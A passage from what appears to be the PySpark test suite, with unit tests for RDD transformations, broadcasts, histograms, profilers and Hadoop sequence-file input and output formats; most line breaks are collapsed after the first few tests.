        result = a.cartesian(a).collect()
        (x, y) = result[0]
        self.assertEqual(u"Hello World!", x.strip())
        self.assertEqual(u"Hello World!", y.strip())

    def test_deleting_input_files(self):
        # Regression test for SPARK-1025
        tempFile = tempfile.NamedTemporaryFile(delete=False)
        tempFile.write(b"Hello World!")
        tempFile.close()
        data = self.sc.textFile(tempFile.name)
        filtered_data = data.filter(lambda x: True)
        self.assertEqual(1, filtered_data.count())
        os.unlink(tempFile.name)
        # Recomputing after the input vanished must fail loudly, not silently.
        with QuietTest(self.sc):
            self.assertRaises(Exception, lambda: filtered_data.count())

    def test_sampling_default_seed(self):
        # Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(range(1000), 1)
        subset = data.takeSample(False, 10)
        self.assertEqual(len(subset), 10)

    def test_aggregate_by_key(self):
        """aggregateByKey must combine values into per-key sets."""
        data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)

        def seqOp(x, y):
            # Fold one value into the per-partition accumulator set.
            x.add(y)
            return x

        def combOp(x, y):
            # Merge two per-partition accumulator sets.
            x |= y
            return x

        sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
        self.assertEqual(3, len(sets))
        self.assertEqual(set([1]), sets[1])
        self.assertEqual(set([2]), sets[3])
        self.assertEqual(set([1, 3]), sets[5])

    def test_itemgetter(self):
        """operator.itemgetter must work as a map() function on executors."""
        rdd = self.sc.parallelize([range(10)])
        from operator import itemgetter
        self.assertEqual([1], rdd.map(itemgetter(1)).collect())
        self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())

    def test_namedtuple_in_rdd(self):
        """namedtuple records must survive the executor serialization round trip."""
        from collections import namedtuple
        Person = namedtuple("Person", "id firstName lastName")
        jon = Person(1, "Jon", "Doe")
        jane = Person(2, "Jane", "Doe")
        theDoes = self.sc.parallelize([jon, jane])
        self.assertEqual([jon, jane], theDoes.collect())

    def test_large_broadcast(self):
        """A multi-megabyte broadcast variable must reach executor tasks intact."""
        N = 10000
        data = [[float(i) for i in range(300)] for i in range(N)]
        bdata = self.sc.broadcast(data)  # 27MB
        m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
        self.assertEqual(N, m)

    def test_multiple_broadcasts(self):
        """Several broadcasts must coexist; contents verified via md5 checksum."""
        N = 1 << 21
        b1 = self.sc.broadcast(set(range(N)))  # multiple blocks in JVM
        r = list(range(1 << 15))
        random.shuffle(r)
        s = str(r).encode()
        checksum = hashlib.md5(s).hexdigest()
        b2 = self.sc.broadcast(s)
        r = list(set(self.sc.parallelize(range(10), 10).map(
            lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
        # Every task must observe the same (size, checksum) pair.
        self.assertEqual(1, len(r))
        size, csum = r[0]
        self.assertEqual(N, size)
        self.assertEqual(checksum, csum)

        # Re-broadcast new payload and verify again.
        random.shuffle(r)
        s = str(r).encode()
        checksum = hashlib.md5(s).hexdigest()
        b2 = self.sc.broadcast(s)
        r = list(set(self.sc.parallelize(range(10), 10).map(
            lambda x: (len(b1.value), hashlib.md5(b2.value).hexdigest())).collect()))
        self.assertEqual(1, len(r))
        size, csum = r[0]
        self.assertEqual(N, size)
self.assertEqual(checksum, csum) def test_large_closure(self): N = 200000 data = [float(i) for i in xrange(N)] rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data)) self.assertEqual(N, rdd.first()) # regression test for SPARK-6886 self.assertEqual(1, rdd.map(lambda x: (x, 1)).groupByKey().count()) def test_zip_with_different_serializers(self): a = self.sc.parallelize(range(5)) b = self.sc.parallelize(range(100, 105)) self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)]) a = a._reserialize(BatchedSerializer(PickleSerializer(), 2)) b = b._reserialize(MarshalSerializer()) self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)]) # regression test for SPARK-4841 path = os.path.join(SPARK_HOME, "python/test_support/hello.txt") t = self.sc.textFile(path) cnt = t.count() self.assertEqual(cnt, t.zip(t).count()) rdd = t.map(str) self.assertEqual(cnt, t.zip(rdd).count()) # regression test for bug in _reserializer() self.assertEqual(cnt, t.zip(rdd).count()) def test_zip_with_different_object_sizes(self): # regress test for SPARK-5973 a = self.sc.parallelize(range(10000)).map(lambda i: '*' * i) b = self.sc.parallelize(range(10000, 20000)).map(lambda i: '*' * i) self.assertEqual(10000, a.zip(b).count()) def test_zip_with_different_number_of_items(self): a = self.sc.parallelize(range(5), 2) # different number of partitions b = self.sc.parallelize(range(100, 106), 3) self.assertRaises(ValueError, lambda: a.zip(b)) with QuietTest(self.sc): # different number of batched items in JVM b = self.sc.parallelize(range(100, 104), 2) self.assertRaises(Exception, lambda: a.zip(b).count()) # different number of items in one pair b = self.sc.parallelize(range(100, 106), 2) self.assertRaises(Exception, lambda: a.zip(b).count()) # same total number of items, but different distributions a = self.sc.parallelize([2, 3], 2).flatMap(range) b = self.sc.parallelize([3, 2], 2).flatMap(range) self.assertEqual(a.count(), 
b.count()) self.assertRaises(Exception, lambda: a.zip(b).count()) def test_count_approx_distinct(self): rdd = self.sc.parallelize(range(1000)) self.assertTrue(950 < rdd.countApproxDistinct(0.03) < 1050) self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.03) < 1050) self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.03) < 1050) self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.03) < 1050) rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7) self.assertTrue(18 < rdd.countApproxDistinct() < 22) self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22) self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22) self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22) self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001)) def test_histogram(self): # empty rdd = self.sc.parallelize([]) self.assertEqual([0], rdd.histogram([0, 10])[1]) self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1]) self.assertRaises(ValueError, lambda: rdd.histogram(1)) # out of range rdd = self.sc.parallelize([10.01, -0.01]) self.assertEqual([0], rdd.histogram([0, 10])[1]) self.assertEqual([0, 0], rdd.histogram((0, 4, 10))[1]) # in range with one bucket rdd = self.sc.parallelize(range(1, 5)) self.assertEqual([4], rdd.histogram([0, 10])[1]) self.assertEqual([3, 1], rdd.histogram([0, 4, 10])[1]) # in range with one bucket exact match self.assertEqual([4], rdd.histogram([1, 4])[1]) # out of range with two buckets rdd = self.sc.parallelize([10.01, -0.01]) self.assertEqual([0, 0], rdd.histogram([0, 5, 10])[1]) # out of range with two uneven buckets rdd = self.sc.parallelize([10.01, -0.01]) self.assertEqual([0, 0], rdd.histogram([0, 4, 10])[1]) # in range with two buckets rdd = self.sc.parallelize([1, 2, 3, 5, 6]) self.assertEqual([3, 2], rdd.histogram([0, 5, 10])[1]) # in range with two bucket and None rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')]) self.assertEqual([3, 2], rdd.histogram([0, 5, 
10])[1]) # in range with two uneven buckets rdd = self.sc.parallelize([1, 2, 3, 5, 6]) self.assertEqual([3, 2], rdd.histogram([0, 5, 11])[1]) # mixed range with two uneven buckets rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01]) self.assertEqual([4, 3], rdd.histogram([0, 5, 11])[1]) # mixed range with four uneven buckets rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1]) self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1]) # mixed range with uneven buckets and NaN rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1, None, float('nan')]) self.assertEqual([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1]) # out of range with infinite buckets rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")]) self.assertEqual([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1]) # invalid buckets self.assertRaises(ValueError, lambda: rdd.histogram([])) self.assertRaises(ValueError, lambda: rdd.histogram([1])) self.assertRaises(ValueError, lambda: rdd.histogram(0)) self.assertRaises(TypeError, lambda: rdd.histogram({})) # without buckets rdd = self.sc.parallelize(range(1, 5)) self.assertEqual(([1, 4], [4]), rdd.histogram(1)) # without buckets single element rdd = self.sc.parallelize([1]) self.assertEqual(([1, 1], [1]), rdd.histogram(1)) # without bucket no range rdd = self.sc.parallelize([1] * 4) self.assertEqual(([1, 1], [4]), rdd.histogram(1)) # without buckets basic two rdd = self.sc.parallelize(range(1, 5)) self.assertEqual(([1, 2.5, 4], [2, 2]), rdd.histogram(2)) # without buckets with more requested than elements rdd = self.sc.parallelize([1, 2]) buckets = [1 + 0.2 * i for i in range(6)] hist = [1, 0, 0, 0, 1] self.assertEqual((buckets, hist), rdd.histogram(5)) # invalid RDDs rdd = self.sc.parallelize([1, float('inf')]) self.assertRaises(ValueError, lambda: rdd.histogram(2)) rdd = self.sc.parallelize([float('nan')]) 
self.assertRaises(ValueError, lambda: rdd.histogram(2)) # string rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2) self.assertEqual([2, 2], rdd.histogram(["a", "b", "c"])[1]) self.assertEqual((["ab", "ef"], [5]), rdd.histogram(1)) self.assertRaises(TypeError, lambda: rdd.histogram(2)) def test_repartitionAndSortWithinPartitions(self): rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2) repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2) partitions = repartitioned.glom().collect() self.assertEqual(partitions[0], [(0, 5), (0, 8), (2, 6)]) self.assertEqual(partitions[1], [(1, 3), (3, 8), (3, 8)]) def test_distinct(self): rdd = self.sc.parallelize((1, 2, 3)*10, 10) self.assertEqual(rdd.getNumPartitions(), 10) self.assertEqual(rdd.distinct().count(), 3) result = rdd.distinct(5) self.assertEqual(result.getNumPartitions(), 5) self.assertEqual(result.count(), 3) def test_external_group_by_key(self): self.sc._conf.set("spark.python.worker.memory", "1m") N = 200001 kv = self.sc.parallelize(range(N)).map(lambda x: (x % 3, x)) gkv = kv.groupByKey().cache() self.assertEqual(3, gkv.count()) filtered = gkv.filter(lambda kv: kv[0] == 1) self.assertEqual(1, filtered.count()) self.assertEqual([(1, N // 3)], filtered.mapValues(len).collect()) self.assertEqual([(N // 3, N // 3)], filtered.values().map(lambda x: (len(x), len(list(x)))).collect()) result = filtered.collect()[0][1] self.assertEqual(N // 3, len(result)) self.assertTrue(isinstance(result.data, shuffle.ExternalListOfList)) def test_sort_on_empty_rdd(self): self.assertEqual([], self.sc.parallelize(zip([], [])).sortByKey().collect()) def test_sample(self): rdd = self.sc.parallelize(range(0, 100), 4) wo = rdd.sample(False, 0.1, 2).collect() wo_dup = rdd.sample(False, 0.1, 2).collect() self.assertSetEqual(set(wo), set(wo_dup)) wr = rdd.sample(True, 0.2, 5).collect() wr_dup = rdd.sample(True, 0.2, 5).collect() self.assertSetEqual(set(wr), set(wr_dup)) wo_s10 = 
rdd.sample(False, 0.3, 10).collect() wo_s20 = rdd.sample(False, 0.3, 20).collect() self.assertNotEqual(set(wo_s10), set(wo_s20)) wr_s11 = rdd.sample(True, 0.4, 11).collect() wr_s21 = rdd.sample(True, 0.4, 21).collect() self.assertNotEqual(set(wr_s11), set(wr_s21)) def test_null_in_rdd(self): jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc) rdd = RDD(jrdd, self.sc, UTF8Deserializer()) self.assertEqual([u"a", None, u"b"], rdd.collect()) rdd = RDD(jrdd, self.sc, NoOpSerializer()) self.assertEqual([b"a", None, b"b"], rdd.collect()) def test_multiple_python_java_RDD_conversions(self): # Regression test for SPARK-5361 data = [ (u'1', {u'director': u'David Lean'}), (u'2', {u'director': u'Andrew Dominik'}) ] data_rdd = self.sc.parallelize(data) data_java_rdd = data_rdd._to_java_object_rdd() data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd) converted_rdd = RDD(data_python_rdd, self.sc) self.assertEqual(2, converted_rdd.count()) # conversion between python and java RDD threw exceptions data_java_rdd = converted_rdd._to_java_object_rdd() data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd) converted_rdd = RDD(data_python_rdd, self.sc) self.assertEqual(2, converted_rdd.count()) def test_narrow_dependency_in_join(self): rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x)) parted = rdd.partitionBy(2) self.assertEqual(2, parted.union(parted).getNumPartitions()) self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions()) self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions()) tracker = self.sc.statusTracker() self.sc.setJobGroup("test1", "test", True) d = sorted(parted.join(parted).collect()) self.assertEqual(10, len(d)) self.assertEqual((0, (0, 0)), d[0]) jobId = tracker.getJobIdsForGroup("test1")[0] self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds)) self.sc.setJobGroup("test2", "test", True) d = sorted(parted.join(rdd).collect()) self.assertEqual(10, len(d)) 
self.assertEqual((0, (0, 0)), d[0]) jobId = tracker.getJobIdsForGroup("test2")[0] self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds)) self.sc.setJobGroup("test3", "test", True) d = sorted(parted.cogroup(parted).collect()) self.assertEqual(10, len(d)) self.assertEqual([[0], [0]], list(map(list, d[0][1]))) jobId = tracker.getJobIdsForGroup("test3")[0] self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds)) self.sc.setJobGroup("test4", "test", True) d = sorted(parted.cogroup(rdd).collect()) self.assertEqual(10, len(d)) self.assertEqual([[0], [0]], list(map(list, d[0][1]))) jobId = tracker.getJobIdsForGroup("test4")[0] self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds)) # Regression test for SPARK-6294 def test_take_on_jrdd(self): rdd = self.sc.parallelize(range(1 << 20)).map(lambda x: str(x)) rdd._jrdd.first() def test_sortByKey_uses_all_partitions_not_only_first_and_last(self): # Regression test for SPARK-5969 seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence rdd = self.sc.parallelize(seq) for ascending in [True, False]: sort = rdd.sortByKey(ascending=ascending, numPartitions=5) self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending)) sizes = sort.glom().map(len).collect() for size in sizes: self.assertGreater(size, 0) class ProfilerTests(PySparkTestCase): def setUp(self): self._old_sys_path = list(sys.path) class_name = self.__class__.__name__ conf = SparkConf().set("spark.python.profile", "true") self.sc = SparkContext('local[4]', class_name, conf=conf) def test_profiler(self): self.do_computation() profilers = self.sc.profiler_collector.profilers self.assertEqual(1, len(profilers)) id, profiler, _ = profilers[0] stats = profiler.stats() self.assertTrue(stats is not None) width, stat_list = stats.get_print_list([]) func_names = [func_name for fname, n, func_name in stat_list] self.assertTrue("heavy_foo" in func_names) old_stdout = sys.stdout sys.stdout = io = StringIO() self.sc.show_profiles() 
self.assertTrue("heavy_foo" in io.getvalue()) sys.stdout = old_stdout d = tempfile.gettempdir() self.sc.dump_profiles(d) self.assertTrue("rdd_%d.pstats" % id in os.listdir(d)) def test_custom_profiler(self): class TestCustomProfiler(BasicProfiler): def show(self, id): self.result = "Custom formatting" self.sc.profiler_collector.profiler_cls = TestCustomProfiler self.do_computation() profilers = self.sc.profiler_collector.profilers self.assertEqual(1, len(profilers)) _, profiler, _ = profilers[0] self.assertTrue(isinstance(profiler, TestCustomProfiler)) self.sc.show_profiles() self.assertEqual("Custom formatting", profiler.result) def do_computation(self): def heavy_foo(x): for i in range(1 << 18): x = 1 rdd = self.sc.parallelize(range(100)) rdd.foreach(heavy_foo) class InputFormatTests(ReusedPySparkTestCase): @classmethod def setUpClass(cls): ReusedPySparkTestCase.setUpClass() cls.tempdir = tempfile.NamedTemporaryFile(delete=False) os.unlink(cls.tempdir.name) cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc) @classmethod def tearDownClass(cls): ReusedPySparkTestCase.tearDownClass() shutil.rmtree(cls.tempdir.name) @unittest.skipIf(sys.version >= "3", "serialize array of byte") def test_sequencefiles(self): basepath = self.tempdir.name ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text").collect()) ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')] self.assertEqual(ints, ei) doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/", "org.apache.hadoop.io.DoubleWritable", "org.apache.hadoop.io.Text").collect()) ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')] self.assertEqual(doubles, ed) bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.BytesWritable").collect()) ebs = [(1, bytearray('aa', 
'utf-8')), (1, bytearray('aa', 'utf-8')), (2, bytearray('aa', 'utf-8')), (2, bytearray('bb', 'utf-8')), (2, bytearray('bb', 'utf-8')), (3, bytearray('cc', 'utf-8'))] self.assertEqual(bytes, ebs) text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/", "org.apache.hadoop.io.Text", "org.apache.hadoop.io.Text").collect()) et = [(u'1', u'aa'), (u'1', u'aa'), (u'2', u'aa'), (u'2', u'bb'), (u'2', u'bb'), (u'3', u'cc')] self.assertEqual(text, et) bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.BooleanWritable").collect()) eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)] self.assertEqual(bools, eb) nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.BooleanWritable").collect()) en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)] self.assertEqual(nulls, en) maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable").collect() em = [(1, {}), (1, {3.0: u'bb'}), (2, {1.0: u'aa'}), (2, {1.0: u'cc'}), (3, {2.0: u'dd'})] for v in maps: self.assertTrue(v in em) # arrays get pickled to tuples by default tuples = sorted(self.sc.sequenceFile( basepath + "/sftestdata/sfarray/", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable").collect()) et = [(1, ()), (2, (3.0, 4.0, 5.0)), (3, (4.0, 5.0, 6.0))] self.assertEqual(tuples, et) # with custom converters, primitive arrays can stay as arrays arrays = sorted(self.sc.sequenceFile( basepath + "/sftestdata/sfarray/", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable", valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect()) ea = [(1, array('d')), (2, array('d', [3.0, 4.0, 5.0])), (3, array('d', [4.0, 5.0, 6.0]))] self.assertEqual(arrays, ea) clazz = 
sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/", "org.apache.hadoop.io.Text", "org.apache.spark.api.python.TestWritable").collect()) cname = u'org.apache.spark.api.python.TestWritable' ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}), (u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}), (u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}), (u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}), (u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})] self.assertEqual(clazz, ec) unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/", "org.apache.hadoop.io.Text", "org.apache.spark.api.python.TestWritable", ).collect()) self.assertEqual(unbatched_clazz, ec) def test_oldhadoop(self): basepath = self.tempdir.name ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapred.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text").collect()) ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')] self.assertEqual(ints, ei) hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt") oldconf = {"mapred.input.dir": hellopath} hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat", "org.apache.hadoop.io.LongWritable", "org.apache.hadoop.io.Text", conf=oldconf).collect() result = [(0, u'Hello World!')] self.assertEqual(hello, result) def test_newhadoop(self): basepath = self.tempdir.name ints = sorted(self.sc.newAPIHadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text").collect()) ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')] self.assertEqual(ints, ei) hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt") newconf = {"mapred.input.dir": hellopath} 
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat", "org.apache.hadoop.io.LongWritable", "org.apache.hadoop.io.Text", conf=newconf).collect() result = [(0, u'Hello World!')] self.assertEqual(hello, result) def test_newolderror(self): basepath = self.tempdir.name self.assertRaises(Exception, lambda: self.sc.hadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text")) self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapred.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text")) def test_bad_inputs(self): basepath = self.tempdir.name self.assertRaises(Exception, lambda: self.sc.sequenceFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.io.NotValidWritable", "org.apache.hadoop.io.Text")) self.assertRaises(Exception, lambda: self.sc.hadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapred.NotValidInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text")) self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile( basepath + "/sftestdata/sfint/", "org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text")) def test_converters(self): # use of custom converters basepath = self.tempdir.name maps = sorted(self.sc.sequenceFile( basepath + "/sftestdata/sfmap/", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable", keyConverter="org.apache.spark.api.python.TestInputKeyConverter", valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect()) em = [(u'\x01', []), (u'\x01', [3.0]), (u'\x02', [1.0]), (u'\x02', [1.0]), (u'\x03', [2.0])] self.assertEqual(maps, em) def test_binary_files(self): path = os.path.join(self.tempdir.name, "binaryfiles") os.mkdir(path) data = b"short binary data" 
with open(os.path.join(path, "part-0000"), 'wb') as f: f.write(data) [(p, d)] = self.sc.binaryFiles(path).collect() self.assertTrue(p.endswith("part-0000")) self.assertEqual(d, data) def test_binary_records(self): path = os.path.join(self.tempdir.name, "binaryrecords") os.mkdir(path) with open(os.path.join(path, "part-0000"), 'w') as f: for i in range(100): f.write('%04d' % i) result = self.sc.binaryRecords(path, 4).map(int).collect() self.assertEqual(list(range(100)), result) class OutputFormatTests(ReusedPySparkTestCase): def setUp(self): self.tempdir = tempfile.NamedTemporaryFile(delete=False) os.unlink(self.tempdir.name) def tearDown(self): shutil.rmtree(self.tempdir.name, ignore_errors=True) @unittest.skipIf(sys.version >= "3", "serialize array of byte") def test_sequencefiles(self): basepath = self.tempdir.name ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')] self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/") ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect()) self.assertEqual(ints, ei) ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')] self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/") doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect()) self.assertEqual(doubles, ed) ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))] self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/") bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect()) self.assertEqual(bytes, ebs) et = [(u'1', u'aa'), (u'2', u'bb'), (u'3', u'cc')] self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/") text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect()) self.assertEqual(text, et) eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)] self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/") bools = sorted(self.sc.sequenceFile(basepath + 
"/sfbool/").collect()) self.assertEqual(bools, eb) en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)] self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/") nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect()) self.assertEqual(nulls, en) em = [(1, {}), (1, {3.0: u'bb'}), (2, {1.0: u'aa'}), (2, {1.0: u'cc'}), (3, {2.0: u'dd'})] self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/") maps = self.sc.sequenceFile(basepath + "/sfmap/").collect() for v in maps: self.assertTrue(v, em) def test_oldhadoop(self): basepath = self.tempdir.name dict_data = [(1, {}), (1, {"row1": 1.0}), (2, {"row2": 2.0})] self.sc.parallelize(dict_data).saveAsHadoopFile( basepath + "/oldhadoop/", "org.apache.hadoop.mapred.SequenceFileOutputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable") result = self.sc.hadoopFile( basepath + "/oldhadoop/", "org.apache.hadoop.mapred.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable").collect() for v in result: self.assertTrue(v, dict_data) conf = { "mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat", "mapred.output.key.class": "org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.hadoop.io.MapWritable", "mapred.output.dir": basepath + "/olddataset/" } self.sc.parallelize(dict_data).saveAsHadoopDataset(conf) input_conf = {"mapred.input.dir": basepath + "/olddataset/"} result = self.sc.hadoopRDD( "org.apache.hadoop.mapred.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.MapWritable", conf=input_conf).collect() for v in result: self.assertTrue(v, dict_data) def test_newhadoop(self): basepath = self.tempdir.name data = [(1, ""), (1, "a"), (2, "bcdf")] self.sc.parallelize(data).saveAsNewAPIHadoopFile( basepath + "/newhadoop/", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "org.apache.hadoop.io.IntWritable", 
"org.apache.hadoop.io.Text") result = sorted(self.sc.newAPIHadoopFile( basepath + "/newhadoop/", "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text").collect()) self.assertEqual(result, data) conf = { "mapreduce.outputformat.class": "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "mapred.output.key.class": "org.apache.hadoop.io.IntWritable", "mapred.output.value.class": "org.apache.hadoop.io.Text", "mapred.output.dir": basepath + "/newdataset/" } self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf) input_conf = {"mapred.input.dir": basepath + "/newdataset/"} new_dataset = sorted(self.sc.newAPIHadoopRDD( "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.hadoop.io.Text", conf=input_conf).collect()) self.assertEqual(new_dataset, data) @unittest.skipIf(sys.version >= "3", "serialize of array") def test_newhadoop_with_array(self): basepath = self.tempdir.name # use custom ArrayWritable types and converters to handle arrays array_data = [(1, array('d')), (1, array('d', [1.0, 2.0, 3.0])), (2, array('d', [3.0, 4.0, 5.0]))] self.sc.parallelize(array_data).saveAsNewAPIHadoopFile( basepath + "/newhadoop/", "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable", valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter") result = sorted(self.sc.newAPIHadoopFile( basepath + "/newhadoop/", "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat", "org.apache.hadoop.io.IntWritable", "org.apache.spark.api.python.DoubleArrayWritable", valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect()) self.assertEqual(result, array_data) conf = { "mapreduce.outputformat.class": "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat", "mapred.output.key.class": 
